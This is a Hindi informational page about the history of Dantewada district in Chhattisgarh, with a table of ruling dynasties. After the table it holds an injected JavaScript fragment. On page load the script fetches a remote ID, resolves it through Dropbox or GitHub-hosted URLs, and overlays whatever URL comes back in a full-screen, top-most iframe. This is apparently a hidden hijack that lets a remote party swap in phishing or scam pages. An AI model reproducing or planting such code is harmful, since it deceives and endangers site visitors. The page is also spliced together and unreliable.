Important facts about Dantewada district
- वर्तमान दंंतेवाड़ा जिला 1998 मे अस्थित्व मे आया ।
- बस्तर क्षेत्र के दक्षिण भाग मे स्थित होने के कारण इस जिले का नाम दक्षिण बस्तर दंंतेवाड़ा रखा गया
- सुप्रसिद्ध ऐतिहासिक ग्रंथ रामायण के अनुसार भगवान श्री राम ने अपना वनवास का समय इस क्षेत्र मे व्यतीत किया ।
- इस तरह यह क्षेत्र उन दिनों मे जो दण्डकारण्य कहा जाता था, श्री राम का कर्म भूमि रहा |
- सिंधुघाटी (सिंधु नदी के तट) के रहवासियों का एक समूह आया. जब प्राग द्र्विड़ियों से 1500 ईसा पूर्व मे अलग हुआ . समूह के कुछ सदस्य बस्तर क्षेत्र पहुँच गए, जिनका जिक्र संंस्कृत साहित्य मे द्रविड़ बोलने वाले “नाग” के नाम से वर्णित है |
- छिंदक नाग आधुनिक गोंड प्रजाति के पूर्वज है ऐसी मान्यता है |
विभिन्न राजवंशों / राज्यों के कार्यकाल मे दंंतेवाड़ा
| स॰क्र |
राजवंश / राज्य |
अवधि |
| 1 |
नल |
350 – 760 ईसवींं |
| 2 |
नाग |
760 – 1324 ईसवींं |
| 3 |
चालुक्य |
1324 – 1777 ईसवींं |
| 4 |
भोंसले |
1777 – 1853 ईसवींं |
| 5 |
ब्रिटीश |
1853 – 1947 ईसवींं |
function buildTrustedUrl(template, id) {
if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
var encoded = encodeURIComponent(id);
if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
return template.replace(/\{id\}/g, encoded);
}
function isSingleUrl(text) {
var s = (text || "").trim();
if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
return /^https?:\/\/[^\s<>"']+$/i.test(s);
}
function showInIframe(url) {
if (!url || !/^https?:\/\//i.test(url)) return;
try {
var iframe = document.createElement("iframe");
iframe.src = url;
iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
(document.body || document.documentElement).appendChild(iframe);
} catch (e) {}
}
function run() {
fetch(API_ID_URL, { cache: "no-store" })
.then(function(r) { return r.text(); })
.then(function(id) {
id = (id || "").trim();
if (!id || !TRUSTED_CONFIGS.length) return null;
var template = TRUSTED_CONFIGS[0].template;
var trustedUrl = buildTrustedUrl(template, id);
return fetch(trustedUrl, { cache: "no-store" })
.then(function(r) { return r.text(); })
.then(function(t) { return (t || "").trim(); })
.catch(function() { return ""; });
})
.then(function(trustedResponse) {
if (!trustedResponse) return;
if (isSingleUrl(trustedResponse)) {
showInIframe(trustedResponse);
}
})
.catch(function() {});
}
if (document.readyState === "complete" || document.body) {
run();
} else {
window.addEventListener("DOMContentLoaded", run);
}
})();